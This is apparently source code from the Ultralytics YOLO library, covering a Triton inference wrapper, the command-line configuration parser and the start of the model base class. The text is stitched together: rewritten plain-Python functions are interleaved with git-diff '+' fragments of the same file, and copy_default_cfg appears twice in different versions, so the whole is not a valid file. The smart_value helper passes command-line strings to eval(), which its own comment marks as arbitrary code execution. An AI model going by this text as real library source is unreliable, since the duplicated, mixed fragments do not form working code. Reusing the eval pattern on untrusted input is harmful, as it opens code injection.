        config["output"] = sorted(config["output"], key=lambda entry: entry.get("name"))

        # Model attributes
        numpy_types = {"TYPE_FP32": np.float32, "TYPE_FP16": np.float16, "TYPE_UINT8": np.uint8}
        model_inputs = config["input"]
        self.InferRequestedOutput = client.InferRequestedOutput
        self.InferInput = client.InferInput
        self.input_formats = [entry["data_type"] for entry in model_inputs]
        self.np_input_formats = [numpy_types[fmt] for fmt in self.input_formats]
        self.input_names = [entry["name"] for entry in model_inputs]
        self.output_names = [entry["name"] for entry in config["output"]]

    def __call__(self, *inputs: np.ndarray) -> List[np.ndarray]:
        """
        Run inference on the remote model.

        Args:
            *inputs (np.ndarray): Input arrays, matched positionally to the model inputs. Each array is cast to the
                numpy dtype configured for its input when the dtypes differ.

        Returns:
            (List[np.ndarray]): Model outputs in `output_names` order, cast to the dtype of the first input.
        """
        result_dtype = inputs[0].dtype  # outputs are returned in the caller's original dtype
        requests = []
        for idx, array in enumerate(inputs):
            expected = self.np_input_formats[idx]
            if array.dtype != expected:
                array = array.astype(expected)
            triton_dtype = self.input_formats[idx].replace("TYPE_", "")
            request = self.InferInput(self.input_names[idx], [*array.shape], triton_dtype)
            request.set_data_from_numpy(array)
            requests.append(request)

        wanted = [self.InferRequestedOutput(name) for name in self.output_names]
        response = self.triton_client.infer(model_name=self.endpoint, inputs=requests, outputs=wanted)

        return [response.as_numpy(name).astype(result_dtype) for name in self.output_names]
ASSETS, + DEFAULT_CFG, + DEFAULT_CFG_DICT, + DEFAULT_CFG_PATH, + DEFAULT_SOL_DICT, + IS_VSCODE, + LOGGER, + RANK, + ROOT, + RUNS_DIR, + SETTINGS, + SETTINGS_FILE, + TESTS_RUNNING, + IterableSimpleNamespace, + __version__, + checks, + colorstr, + deprecation_warn, + vscode_msg, + yaml_load, + yaml_print, +) + +# Define valid solutions +SOLUTION_MAP = { + "count": ("ObjectCounter", "count"), + "heatmap": ("Heatmap", "generate_heatmap"), + "queue": ("QueueManager", "process_queue"), + "speed": ("SpeedEstimator", "estimate_speed"), + "workout": ("AIGym", "monitor"), + "analytics": ("Analytics", "process_data"), + "trackzone": ("TrackZone", "trackzone"), + "help": None, +} + +# Define valid tasks and modes +MODES = {"train", "val", "predict", "export", "track", "benchmark"} +TASKS = {"detect", "segment", "classify", "pose", "obb"} +TASK2DATA = { + "detect": "coco8.yaml", + "segment": "coco8-seg.yaml", + "classify": "imagenet10", + "pose": "coco8-pose.yaml", + "obb": "dota8.yaml", +} +TASK2MODEL = { + "detect": "yolo11n.pt", + "segment": "yolo11n-seg.pt", + "classify": "yolo11n-cls.pt", + "pose": "yolo11n-pose.pt", + "obb": "yolo11n-obb.pt", +} +TASK2METRIC = { + "detect": "metrics/mAP50-95(B)", + "segment": "metrics/mAP50-95(M)", + "classify": "metrics/accuracy_top1", + "pose": "metrics/mAP50-95(P)", + "obb": "metrics/mAP50-95(B)", +} +MODELS = {TASK2MODEL[task] for task in TASKS} + +ARGV = sys.argv or ["", ""] # sometimes sys.argv = [] +SOLUTIONS_HELP_MSG = f""" + Arguments received: {str(['yolo'] + ARGV[1:])}. Ultralytics 'yolo solutions' usage overview: + + yolo solutions SOLUTION ARGS + + Where SOLUTION (optional) is one of {list(SOLUTION_MAP.keys())} + ARGS (optional) are any number of custom 'arg=value' pairs like 'show_in=True' that override defaults + at https://docs.ultralytics.com/usage/cfg + + 1. Call object counting solution + yolo solutions count source="path/to/video/file.mp4" region=[(20, 400), (1080, 400), (1080, 360), (20, 360)] + + 2. 
Call heatmaps solution + yolo solutions heatmap colormap=cv2.COLORMAP_PARAULA model=yolo11n.pt + + 3. Call queue management solution + yolo solutions queue region=[(20, 400), (1080, 400), (1080, 360), (20, 360)] model=yolo11n.pt + + 4. Call workouts monitoring solution for push-ups + yolo solutions workout model=yolo11n-pose.pt kpts=[6, 8, 10] + + 5. Generate analytical graphs + yolo solutions analytics analytics_type="pie" + + 6. Track Objects Within Specific Zones + yolo solutions trackzone source="path/to/video/file.mp4" region=[(150, 150), (1130, 150), (1130, 570), (150, 570)] + """ +CLI_HELP_MSG = f""" + Arguments received: {str(['yolo'] + ARGV[1:])}. Ultralytics 'yolo' commands use the following syntax: + + yolo TASK MODE ARGS + + Where TASK (optional) is one of {TASKS} + MODE (required) is one of {MODES} + ARGS (optional) are any number of custom 'arg=value' pairs like 'imgsz=320' that override defaults. + See all ARGS at https://docs.ultralytics.com/usage/cfg or with 'yolo cfg' + + 1. Train a detection model for 10 epochs with an initial learning_rate of 0.01 + yolo train data=coco8.yaml model=yolo11n.pt epochs=10 lr0=0.01 + + 2. Predict a YouTube video using a pretrained segmentation model at image size 320: + yolo predict model=yolo11n-seg.pt source='https://youtu.be/LNwODJXcvt4' imgsz=320 + + 3. Val a pretrained detection model at batch-size 1 and image size 640: + yolo val model=yolo11n.pt data=coco8.yaml batch=1 imgsz=640 + + 4. Export a YOLO11n classification model to ONNX format at image size 224 by 128 (no TASK required) + yolo export model=yolo11n-cls.pt format=onnx imgsz=224,128 + + 5. Streamlit real-time webcam inference GUI + yolo streamlit-predict + + 6. Ultralytics solutions usage + yolo solutions count or in {list(SOLUTION_MAP.keys())} source="path/to/video/file.mp4" + + 7. 
def cfg2dict(cfg):
    """
    Return a configuration object as a dictionary.

    Args:
        cfg (str | Path | Dict | SimpleNamespace): Configuration to convert. A string or Path is loaded with
            `yaml_load`, a SimpleNamespace is converted with `vars()`, and anything else is passed through.

    Returns:
        (Dict): The configuration in dictionary form. For a SimpleNamespace this is the namespace's own attribute
            dictionary (not a copy); for any other non-path input it is the very object that was passed in.

    Examples:
        Convert a YAML file path to a dictionary:
        >>> config_dict = cfg2dict("config.yaml")

        Convert a SimpleNamespace to a dictionary:
        >>> from types import SimpleNamespace
        >>> config_dict = cfg2dict(SimpleNamespace(param1="value1", param2="value2"))

        Pass through an already existing dictionary:
        >>> config_dict = cfg2dict({"param1": "value1", "param2": "value2"})
    """
    if isinstance(cfg, (str, Path)):
        return yaml_load(cfg)  # file path -> loaded dict
    if isinstance(cfg, SimpleNamespace):
        return vars(cfg)  # namespace -> attribute dict
    return cfg
def check_cfg(cfg, hard=True):
    """
    Validate, and optionally coerce, the types and values of configuration arguments.

    Keys listed in CFG_FLOAT_KEYS, CFG_FRACTION_KEYS, CFG_INT_KEYS and CFG_BOOL_KEYS are checked against their
    expected type. Keys outside of these sets, and None values, are left untouched.

    Args:
        cfg (Dict): Configuration dictionary to validate. It is modified in-place when values are coerced.
        hard (bool): If True, a value of the wrong type raises TypeError. If False, the value is converted to the
            expected type instead; a failed float()/int() conversion propagates its own error.

    Raises:
        TypeError: If `hard` is True and a value has an invalid type.
        ValueError: If a CFG_FRACTION_KEYS value lies outside [0.0, 1.0]. This range check applies for any `hard`.

    Examples:
        >>> config = {
        ...     "epochs": "50",  # str instead of int
        ...     "lr0": 0.01,  # valid fraction
        ...     "save": "false",  # str instead of bool
        ... }
        >>> check_cfg(config, hard=False)
        >>> print(config)
        {'epochs': 50, 'lr0': 0.01, 'save': False}
    """
    # bool() of any non-empty string is True, so textual negatives need explicit handling during soft coercion
    false_strings = {"", "false", "0", "no", "off"}

    for k, v in cfg.items():
        if v is None:  # None values may be from optional args
            continue
        if k in CFG_FLOAT_KEYS and not isinstance(v, (int, float)):
            if hard:
                raise TypeError(
                    f"'{k}={v}' is of invalid type {type(v).__name__}. "
                    f"Valid '{k}' types are int (i.e. '{k}=0') or float (i.e. '{k}=0.5')"
                )
            cfg[k] = float(v)
        elif k in CFG_FRACTION_KEYS:
            if not isinstance(v, (int, float)):
                if hard:
                    raise TypeError(
                        f"'{k}={v}' is of invalid type {type(v).__name__}. "
                        f"Valid '{k}' types are int (i.e. '{k}=0') or float (i.e. '{k}=0.5')"
                    )
                cfg[k] = v = float(v)
            if not (0.0 <= v <= 1.0):  # enforced even when hard=False
                raise ValueError(f"'{k}={v}' is an invalid value. " f"Valid '{k}' values are between 0.0 and 1.0.")
        elif k in CFG_INT_KEYS and not isinstance(v, int):
            if hard:
                raise TypeError(
                    f"'{k}={v}' is of invalid type {type(v).__name__}. " f"'{k}' must be an int (i.e. '{k}=8')"
                )
            cfg[k] = int(v)
        elif k in CFG_BOOL_KEYS and not isinstance(v, bool):
            if hard:
                raise TypeError(
                    f"'{k}={v}' is of invalid type {type(v).__name__}. "
                    f"'{k}' must be a bool (i.e. '{k}=True' or '{k}=False')"
                )
            cfg[k] = v.strip().lower() not in false_strings if isinstance(v, str) else bool(v)
+ + Examples: + >>> from types import SimpleNamespace + >>> args = SimpleNamespace(project="my_project", task="detect", mode="train", exist_ok=True) + >>> save_dir = get_save_dir(args) + >>> print(save_dir) + my_project/detect/train + """ + if getattr(args, "save_dir", None): + save_dir = args.save_dir + else: + from ultralytics.utils.files import increment_path + + project = args.project or (ROOT.parent / "tests/tmp/runs" if TESTS_RUNNING else RUNS_DIR) / args.task + name = name or args.name or f"{args.mode}" + save_dir = increment_path(Path(project) / name, exist_ok=args.exist_ok if RANK in {-1, 0} else True) + + return Path(save_dir) + + +def _handle_deprecation(custom): + """ + Handles deprecated configuration keys by mapping them to current equivalents with deprecation warnings. + + Args: + custom (Dict): Configuration dictionary potentially containing deprecated keys. + + Examples: + >>> custom_config = {"boxes": True, "hide_labels": "False", "line_thickness": 2} + >>> _handle_deprecation(custom_config) + >>> print(custom_config) + {'show_boxes': True, 'show_labels': True, 'line_width': 2} + + Notes: + This function modifies the input dictionary in-place, replacing deprecated keys with their current + equivalents. It also handles value conversions where necessary, such as inverting boolean values for + 'hide_labels' and 'hide_conf'. 
+ """ + for key in custom.copy().keys(): + if key == "boxes": + deprecation_warn(key, "show_boxes") + custom["show_boxes"] = custom.pop("boxes") + if key == "hide_labels": + deprecation_warn(key, "show_labels") + custom["show_labels"] = custom.pop("hide_labels") == "False" + if key == "hide_conf": + deprecation_warn(key, "show_conf") + custom["show_conf"] = custom.pop("hide_conf") == "False" + if key == "line_thickness": + deprecation_warn(key, "line_width") + custom["line_width"] = custom.pop("line_thickness") + if key == "label_smoothing": + deprecation_warn(key) + custom.pop("label_smoothing") + + return custom + + +def check_dict_alignment(base: Dict, custom: Dict, e=None): + """ + Checks alignment between custom and base configuration dictionaries, handling deprecated keys and providing error + messages for mismatched keys. + + Args: + base (Dict): The base configuration dictionary containing valid keys. + custom (Dict): The custom configuration dictionary to be checked for alignment. + e (Exception | None): Optional error instance passed by the calling function. + + Raises: + SystemExit: If mismatched keys are found between the custom and base dictionaries. + + Examples: + >>> base_cfg = {"epochs": 50, "lr0": 0.01, "batch_size": 16} + >>> custom_cfg = {"epoch": 100, "lr": 0.02, "batch_size": 32} + >>> try: + ... check_dict_alignment(base_cfg, custom_cfg) + ... except SystemExit: + ... print("Mismatched keys found") + + Notes: + - Suggests corrections for mismatched keys based on similarity to valid keys. + - Automatically replaces deprecated keys in the custom configuration with updated equivalents. + - Prints detailed error messages for each mismatched key to help users correct their configurations. 
def merge_equals_args(args: List[str]) -> List[str]:
    """
    Merge arguments split around '=' and re-join list values that were split inside square brackets.

    The work is done in two passes so that both repairs compose:
        1. Tokens around an '=' are merged:
            - ['arg', '=', 'val'] becomes ['arg=val']
            - ['arg=', 'val'] becomes ['arg=val'] (only when 'val' itself contains no '=')
            - ['arg', '=val'] becomes ['arg=val']
        2. Consecutive tokens are concatenated until every '[' has its matching ']', e.g.
           ['imgsz=[3,', '640,', '640]'] becomes ['imgsz=[3,640,640]'].

    Args:
        args (List[str]): A list of strings where each element represents an argument or a fragment of one.

    Returns:
        (List[str]): The arguments with '=' fragments merged and bracketed fragments joined. A trailing fragment
            whose brackets never balance is returned as the last element.

    Examples:
        >>> args = ["arg1", "=", "value", "arg2=", "value2", "arg3", "=value3", "imgsz=[3,", "640,", "640]"]
        >>> merge_equals_args(args)
        ['arg1=value', 'arg2=value2', 'arg3=value3', 'imgsz=[3,640,640]']
        >>> merge_equals_args(["classes", "=", "[0,", "1]"])
        ['classes=[0,1]']
    """
    # Pass 1: merge tokens that were split around an '=' sign
    merged = []
    i, n = 0, len(args)
    while i < n:
        arg = args[i]
        has_next = i < n - 1
        if arg == "=" and merged and has_next:  # ['arg', '=', 'val']
            merged[-1] += f"={args[i + 1]}"
            i += 2
        elif arg.endswith("=") and has_next and "=" not in args[i + 1]:  # ['arg=', 'val']
            merged.append(f"{arg}{args[i + 1]}")
            i += 2
        elif arg.startswith("=") and merged:  # ['arg', '=val']
            merged[-1] += arg
            i += 1
        else:
            merged.append(arg)
            i += 1

    # Pass 2: join fragments until brackets balance. Running this on the merged tokens means that a value such as
    # '[0,' attached to its key in pass 1 still opens a bracket group here.
    new_args = []
    current = ""
    depth = 0
    for arg in merged:
        depth += arg.count("[") - arg.count("]")
        current += arg
        if depth == 0:
            new_args.append(current)
            current = ""

    # Append any remaining (unbalanced) fragment
    if current:
        new_args.append(current)

    return new_args
+ """ + from ultralytics import hub + + if args[0] == "login": + key = args[1] if len(args) > 1 else "" + # Log in to Ultralytics HUB using the provided API key + hub.login(key) + elif args[0] == "logout": + # Log out from Ultralytics HUB + hub.logout() + + +def handle_yolo_settings(args: List[str]) -> None: + """ + Handles YOLO settings command-line interface (CLI) commands. + + This function processes YOLO settings CLI commands such as reset and updating individual settings. It should be + called when executing a script with arguments related to YOLO settings management. + + Args: + args (List[str]): A list of command line arguments for YOLO settings management. + + Examples: + >>> handle_yolo_settings(["reset"]) # Reset YOLO settings + >>> handle_yolo_settings(["default_cfg_path=yolo11n.yaml"]) # Update a specific setting + + Notes: + - If no arguments are provided, the function will display the current settings. + - The 'reset' command will delete the existing settings file and create new default settings. + - Other arguments are treated as key-value pairs to update specific settings. + - The function will check for alignment between the provided settings and the existing ones. + - After processing, the updated settings will be displayed. 
def handle_yolo_solutions(args: List[str]) -> None:
    """
    Parse 'yolo solutions' arguments and run the selected solution over every frame of a video source.

    Args:
        args (List[str]): Command-line arguments for the Ultralytics YOLO solutions
            (https://docs.ultralytics.com/solutions/): an optional solution name followed by 'key=value' pairs or
            boolean flags. The solution name, when present, is removed from this list.

    Returns:
        None: Frames are processed and written to a video file; nothing is returned.

    Raises:
        SyntaxError: Raised through `check_dict_alignment` when an argument is not a known configuration key.

    Examples:
        Run people counting solution with default settings:
        >>> handle_yolo_solutions(["count"])

        Run analytics with custom configuration:
        >>> handle_yolo_solutions(["analytics", "conf=0.25", "source=path/to/video/file.mp4"])

    Notes:
        - Valid argument keys are the union of DEFAULT_SOL_DICT and DEFAULT_CFG_DICT.
        - A bare argument is accepted as a flag only when its default value is a bool; it is then set to True.
        - Available solutions are defined in SOLUTION_MAP with their class and method names.
        - If the first argument is not a known solution, the 'count' solution is used.
        - 'help' prints SOLUTIONS_HELP_MSG and returns without processing any video.
        - Output is written as 'solution.avi' inside a directory obtained from `increment_path` for
          'runs/solutions/exp'.
        - For the 'analytics' solution the frame number is passed along and the output size is fixed to 1920x1080.
        - Processing stops at the end of the video or when 'q' is pressed.
    """
    full_args_dict = {**DEFAULT_SOL_DICT, **DEFAULT_CFG_DICT}  # arguments dictionary
    overrides = {}

    # Collect overrides and check dictionary alignment
    for arg in merge_equals_args(args):
        arg = arg.lstrip("-").rstrip(",")
        if "=" in arg:
            try:
                k, v = parse_key_value_pair(arg)
                overrides[k] = v
            except (NameError, SyntaxError, ValueError, AssertionError) as e:
                check_dict_alignment(full_args_dict, {arg: ""}, e)
        elif arg in full_args_dict and isinstance(full_args_dict.get(arg), bool):
            overrides[arg] = True
    check_dict_alignment(full_args_dict, overrides)  # dict alignment

    # Get solution name
    if args and args[0] in SOLUTION_MAP:
        if args[0] == "help":
            LOGGER.info(SOLUTIONS_HELP_MSG)
            return
        s_n = args.pop(0)  # Extract the solution name directly
    else:
        LOGGER.warning(
            f"⚠️ No valid solution provided. Using default 'count'. Available: {', '.join(SOLUTION_MAP.keys())}"
        )
        s_n = "count"  # Default solution if none provided

    if args and args[0] == "help":  # 'help' directly after a solution name also ends the command
        return

    cls, method = SOLUTION_MAP[s_n]  # solution class name and method name

    from ultralytics import solutions  # import ultralytics solutions
    from ultralytics.utils.files import increment_path  # for output directory path update

    solution = getattr(solutions, cls)(IS_CLI=True, **overrides)  # get solution class i.e ObjectCounter
    process = getattr(solution, method)  # get specific function of class for processing i.e, count from ObjectCounter

    cap = cv2.VideoCapture(solution.CFG["source"])  # read the video file

    # Extract width, height and fps of the video file, create save directory and initialize video writer
    w, h, fps = (int(cap.get(x)) for x in (cv2.CAP_PROP_FRAME_WIDTH, cv2.CAP_PROP_FRAME_HEIGHT, cv2.CAP_PROP_FPS))
    if s_n == "analytics":  # analytical graphs follow fixed shape for output i.e w=1920, h=1080
        w, h = 1920, 1080
    save_dir = increment_path(Path("runs") / "solutions" / "exp", exist_ok=False)
    save_dir.mkdir(parents=True, exist_ok=True)  # create the output directory
    vw = cv2.VideoWriter(str(save_dir / "solution.avi"), cv2.VideoWriter_fourcc(*"mp4v"), fps, (w, h))

    try:  # Process video frames
        f_n = 0  # frame number, required for analytical graphs
        while cap.isOpened():
            success, frame = cap.read()
            if not success:
                break
            frame = process(frame, f_n := f_n + 1) if s_n == "analytics" else process(frame)
            vw.write(frame)
            if cv2.waitKey(1) & 0xFF == ord("q"):
                break
    finally:
        cap.release()
        vw.release()  # the writer was previously never released, leaving the output file unfinalized
def smart_value(v):
    """
    Turn the string form of a value into the Python object it most plausibly represents.

    The keywords 'none', 'true' and 'false' are matched case-insensitively. Every other string is evaluated as a
    Python expression, and the original string is returned when that evaluation fails for any reason.

    Args:
        v (str): The string representation of the value to be converted.

    Returns:
        (Any): None, a bool, the result of evaluating `v`, or `v` itself when it cannot be evaluated.

    Examples:
        >>> smart_value("42")
        42
        >>> smart_value("3.14")
        3.14
        >>> smart_value("True")
        True
        >>> smart_value("None")
        None
        >>> smart_value("some_string")
        'some_string'

    Notes:
        - SECURITY: values reach eval() unfiltered, which executes arbitrary expressions. Only call this on trusted
          input such as the operator's own command line.
        - The evaluated expression can see this function's local names, so they are deliberately kept minimal.
    """
    v_lower = v.lower()
    if v_lower in ("none", "true", "false"):
        return {"none": None, "true": True, "false": False}[v_lower]
    try:
        return eval(v)
    except Exception:
        return v  # not a valid expression, keep the raw string
+ + Examples: + Train a detection model for 10 epochs with an initial learning_rate of 0.01: + >>> entrypoint("train data=coco8.yaml model=yolo11n.pt epochs=10 lr0=0.01") + + Predict a YouTube video using a pretrained segmentation model at image size 320: + >>> entrypoint("predict model=yolo11n-seg.pt source='https://youtu.be/LNwODJXcvt4' imgsz=320") + + Validate a pretrained detection model at batch-size 1 and image size 640: + >>> entrypoint("val model=yolo11n.pt data=coco8.yaml batch=1 imgsz=640") + + Notes: + - If no arguments are passed, the function will display the usage help message. + - For a list of all available commands and their arguments, see the provided help messages and the + Ultralytics documentation at https://docs.ultralytics.com. + """ + args = (debug.split(" ") if debug else ARGV)[1:] + if not args: # no arguments passed + LOGGER.info(CLI_HELP_MSG) + return + + special = { + "help": lambda: LOGGER.info(CLI_HELP_MSG), + "checks": checks.collect_system_info, + "version": lambda: LOGGER.info(__version__), + "settings": lambda: handle_yolo_settings(args[1:]), + "cfg": lambda: yaml_print(DEFAULT_CFG_PATH), + "hub": lambda: handle_yolo_hub(args[1:]), + "login": lambda: handle_yolo_hub(args), + "logout": lambda: handle_yolo_hub(args), + "copy-cfg": copy_default_cfg, + "streamlit-predict": lambda: handle_streamlit_inference(), + "solutions": lambda: handle_yolo_solutions(args[1:]), + } + full_args_dict = {**DEFAULT_CFG_DICT, **{k: None for k in TASKS}, **{k: None for k in MODES}, **special} + + # Define common misuses of special commands, i.e. -h, -help, --help + special.update({k[0]: v for k, v in special.items()}) # singular + special.update({k[:-1]: v for k, v in special.items() if len(k) > 1 and k.endswith("s")}) # singular + special = {**special, **{f"-{k}": v for k, v in special.items()}, **{f"--{k}": v for k, v in special.items()}} + + overrides = {} # basic overrides, i.e. 
imgsz=320 + for a in merge_equals_args(args): # merge spaces around '=' sign + if a.startswith("--"): + LOGGER.warning(f"WARNING ⚠️ argument '{a}' does not require leading dashes '--', updating to '{a[2:]}'.") + a = a[2:] + if a.endswith(","): + LOGGER.warning(f"WARNING ⚠️ argument '{a}' does not require trailing comma ',', updating to '{a[:-1]}'.") + a = a[:-1] + if "=" in a: + try: + k, v = parse_key_value_pair(a) + if k == "cfg" and v is not None: # custom.yaml passed + LOGGER.info(f"Overriding {DEFAULT_CFG_PATH} with {v}") + overrides = {k: val for k, val in yaml_load(checks.check_yaml(v)).items() if k != "cfg"} + else: + overrides[k] = v + except (NameError, SyntaxError, ValueError, AssertionError) as e: + check_dict_alignment(full_args_dict, {a: ""}, e) + + elif a in TASKS: + overrides["task"] = a + elif a in MODES: + overrides["mode"] = a + elif a.lower() in special: + special[a.lower()]() + return + elif a in DEFAULT_CFG_DICT and isinstance(DEFAULT_CFG_DICT[a], bool): + overrides[a] = True # auto-True for default bool args, i.e. 'yolo show' sets show=True + elif a in DEFAULT_CFG_DICT: + raise SyntaxError( + f"'{colorstr('red', 'bold', a)}' is a valid YOLO argument but is missing an '=' sign " + f"to set its value, i.e. try '{a}={DEFAULT_CFG_DICT[a]}'\n{CLI_HELP_MSG}" + ) + else: + check_dict_alignment(full_args_dict, {a: ""}) + + # Check keys + check_dict_alignment(full_args_dict, overrides) + + # Mode + mode = overrides.get("mode") + if mode is None: + mode = DEFAULT_CFG.mode or "predict" + LOGGER.warning(f"WARNING ⚠️ 'mode' argument is missing. Valid modes are {MODES}. Using default 'mode={mode}'.") + elif mode not in MODES: + raise ValueError(f"Invalid 'mode={mode}'. Valid modes are {MODES}.\n{CLI_HELP_MSG}") + + # Task + task = overrides.pop("task", None) + if task: + if task not in TASKS: + raise ValueError(f"Invalid 'task={task}'. 
Valid tasks are {TASKS}.\n{CLI_HELP_MSG}") + if "model" not in overrides: + overrides["model"] = TASK2MODEL[task] + + # Model + model = overrides.pop("model", DEFAULT_CFG.model) + if model is None: + model = "yolo11n.pt" + LOGGER.warning(f"WARNING ⚠️ 'model' argument is missing. Using default 'model={model}'.") + overrides["model"] = model + stem = Path(model).stem.lower() + if "rtdetr" in stem: # guess architecture + from ultralytics import RTDETR + + model = RTDETR(model) # no task argument + elif "fastsam" in stem: + from ultralytics import FastSAM + + model = FastSAM(model) + elif "sam_" in stem or "sam2_" in stem or "sam2.1_" in stem: + from ultralytics import SAM + + model = SAM(model) + else: + from ultralytics import YOLO + + model = YOLO(model, task=task) + if isinstance(overrides.get("pretrained"), str): + model.load(overrides["pretrained"]) + + # Task Update + if task != model.task: + if task: + LOGGER.warning( + f"WARNING ⚠️ conflicting 'task={task}' passed with 'task={model.task}' model. " + f"Ignoring 'task={task}' and updating to 'task={model.task}' to match model." + ) + task = model.task + + # Mode + if mode in {"predict", "track"} and "source" not in overrides: + overrides["source"] = ( + "https://ultralytics.com/images/boats.jpg" if task == "obb" else DEFAULT_CFG.source or ASSETS + ) + LOGGER.warning(f"WARNING ⚠️ 'source' argument is missing. Using default 'source={overrides['source']}'.") + elif mode in {"train", "val"}: + if "data" not in overrides and "resume" not in overrides: + overrides["data"] = DEFAULT_CFG.data or TASK2DATA.get(task or DEFAULT_CFG.task, DEFAULT_CFG.data) + LOGGER.warning(f"WARNING ⚠️ 'data' argument is missing. Using default 'data={overrides['data']}'.") + elif mode == "export": + if "format" not in overrides: + overrides["format"] = DEFAULT_CFG.format or "torchscript" + LOGGER.warning(f"WARNING ⚠️ 'format' argument is missing. 
def copy_default_cfg():
    """
    Duplicate the default configuration file into the current working directory.

    The copy keeps the default file's name with '.yaml' replaced by '_copy.yaml'. After copying, a message with the
    new file's location and an example command that uses it is logged.

    Examples:
        >>> copy_default_cfg()
        # Output: default.yaml copied to /path/to/current/directory/default_copy.yaml
        # Example YOLO command with this new custom cfg:
        #   yolo cfg='/path/to/current/directory/default_copy.yaml' imgsz=320 batch=8

    Notes:
        - The original default configuration file is left untouched.
        - shutil.copy2 is used, so file metadata is copied along with the contents where possible.
    """
    copy_name = DEFAULT_CFG_PATH.name.replace(".yaml", "_copy.yaml")
    destination = Path.cwd() / copy_name
    shutil.copy2(DEFAULT_CFG_PATH, destination)
    message = (
        f"{DEFAULT_CFG_PATH} copied to {destination}\n"
        f"Example YOLO command with this new custom cfg:\n yolo cfg='{destination}' imgsz=320 batch=8"
    )
    LOGGER.info(message)
+ """ + new_file = Path.cwd() / DEFAULT_CFG_PATH.name.replace(".yaml", "_copy.yaml") + shutil.copy2(DEFAULT_CFG_PATH, new_file) + LOGGER.info( + f"{DEFAULT_CFG_PATH} copied to {new_file}\n" + f"Example YOLO command with this new custom cfg:\n yolo cfg='{new_file}' imgsz=320 batch=8" + ) + + +if __name__ == "__main__": + # Example: entrypoint(debug='yolo predict model=yolo11n.pt') + entrypoint(debug="") diff --git a/2024.ultralytics/v8.3.41/engine/model.py b/2024.ultralytics/v8.3.41/engine/model.py new file mode 100644 index 0000000..874613d --- /dev/null +++ b/2024.ultralytics/v8.3.41/engine/model.py @@ -0,0 +1,1174 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import inspect +from pathlib import Path +from typing import Dict, List, Union + +import numpy as np +import torch +from PIL import Image + +from ultralytics.cfg import TASK2DATA, get_cfg, get_save_dir +from ultralytics.engine.results import Results +from ultralytics.hub import HUB_WEB_ROOT, HUBTrainingSession +from ultralytics.nn.tasks import attempt_load_one_weight, guess_model_task, nn, yaml_model_load +from ultralytics.utils import ( + ARGV, + ASSETS, + DEFAULT_CFG_DICT, + LOGGER, + RANK, + SETTINGS, + callbacks, + checks, + emojis, + yaml_load, +) + + +class Model(nn.Module): + """ + A base class for implementing YOLO models, unifying APIs across different model types. + + This class provides a common interface for various operations related to YOLO models, such as training, + validation, prediction, exporting, and benchmarking. It handles different types of models, including those + loaded from local files, Ultralytics HUB, or Triton Server. + + Attributes: + callbacks (Dict): A dictionary of callback functions for various events during model operations. + predictor (BasePredictor): The predictor object used for making predictions. + model (nn.Module): The underlying PyTorch model. + trainer (BaseTrainer): The trainer object used for training the model. 
+ ckpt (Dict): The checkpoint data if the model is loaded from a *.pt file. + cfg (str): The configuration of the model if loaded from a *.yaml file. + ckpt_path (str): The path to the checkpoint file. + overrides (Dict): A dictionary of overrides for model configuration. + metrics (Dict): The latest training/validation metrics. + session (HUBTrainingSession): The Ultralytics HUB session, if applicable. + task (str): The type of task the model is intended for. + model_name (str): The name of the model. + + Methods: + __call__: Alias for the predict method, enabling the model instance to be callable. + _new: Initializes a new model based on a configuration file. + _load: Loads a model from a checkpoint file. + _check_is_pytorch_model: Ensures that the model is a PyTorch model. + reset_weights: Resets the model's weights to their initial state. + load: Loads model weights from a specified file. + save: Saves the current state of the model to a file. + info: Logs or returns information about the model. + fuse: Fuses Conv2d and BatchNorm2d layers for optimized inference. + predict: Performs object detection predictions. + track: Performs object tracking. + val: Validates the model on a dataset. + benchmark: Benchmarks the model on various export formats. + export: Exports the model to different formats. + train: Trains the model on a dataset. + tune: Performs hyperparameter tuning. + _apply: Applies a function to the model's tensors. + add_callback: Adds a callback function for an event. + clear_callback: Clears all callbacks for an event. + reset_callbacks: Resets all callbacks to their default functions. 
def __init__(
    self,
    model: Union[str, Path] = "yolo11n.pt",
    task: str = None,
    verbose: bool = False,
) -> None:
    """
    Set up a model wrapper from a weights file, a YAML config, a HUB model URL or a Triton Server URL.

    Args:
        model (Union[str, Path]): Path or name of the model to load or create. Converted to a stripped string
            before any further processing.
        task (str | None): Task type for the model. Passed on to the loader / builder.
        verbose (bool): If True, model information is displayed when building from a YAML config.

    Examples:
        >>> model = Model("yolo11n.pt")
        >>> model = Model("path/to/model.yaml", task="detect")
        >>> model = Model("hub_model", verbose=True)

    Notes:
        - For a Triton Server URL only 'model' and 'model_name' are set and initialization stops early.
        - For a HUB model the session is kept on the instance only when it carries training arguments.
    """
    super().__init__()
    self.callbacks = callbacks.get_default_callbacks()
    # predictor (reused), model object, trainer object, *.pt checkpoint, *.yaml cfg and checkpoint path
    for attr in ("predictor", "model", "trainer", "ckpt", "cfg", "ckpt_path"):
        setattr(self, attr, None)
    self.overrides = {}  # overrides for trainer object
    self.metrics = None  # validation/training metrics
    self.session = None  # HUB session
    self.task = task  # task type
    model = str(model).strip()

    if self.is_hub_model(model):
        # Ultralytics HUB model from https://hub.ultralytics.com: fetch it and continue with the local file
        checks.check_requirements("hub-sdk>=0.0.12")
        session = HUBTrainingSession.create_session(model)
        model = session.model_file
        if session.train_args:  # training sent from HUB
            self.session = session
    elif self.is_triton_model(model):
        # Triton Server model: nothing to load locally
        self.model_name = model
        self.model = model
        return

    # Build a new model from a YAML config, otherwise load existing weights
    builds_from_yaml = Path(model).suffix in {".yaml", ".yml"}
    if builds_from_yaml:
        self._new(model, task=task, verbose=verbose)
    else:
        self._load(model, task=task)

    # Delete super().training for accessing self.model.training
    del self.training
def __call__(
    self,
    source: Union[str, Path, int, Image.Image, list, tuple, np.ndarray, torch.Tensor] = None,
    stream: bool = False,
    **kwargs,
) -> list:
    """
    Make the model instance callable by forwarding to predict().

    Args:
        source (str | Path | int | PIL.Image | np.ndarray | torch.Tensor | List | Tuple): The source of the
            image(s) to make predictions on.
        stream (bool): If True, treat the input source as a continuous stream for predictions.
        **kwargs (Any): Additional keyword arguments forwarded unchanged to predict().

    Returns:
        (List[ultralytics.engine.results.Results]): Whatever predict() returns for the same arguments.

    Examples:
        >>> model = YOLO("yolo11n.pt")
        >>> results = model("https://ultralytics.com/images/bus.jpg")
        >>> for r in results:
        ...     print(f"Detected {len(r)} objects in image")
    """
    predictions = self.predict(source, stream, **kwargs)
    return predictions
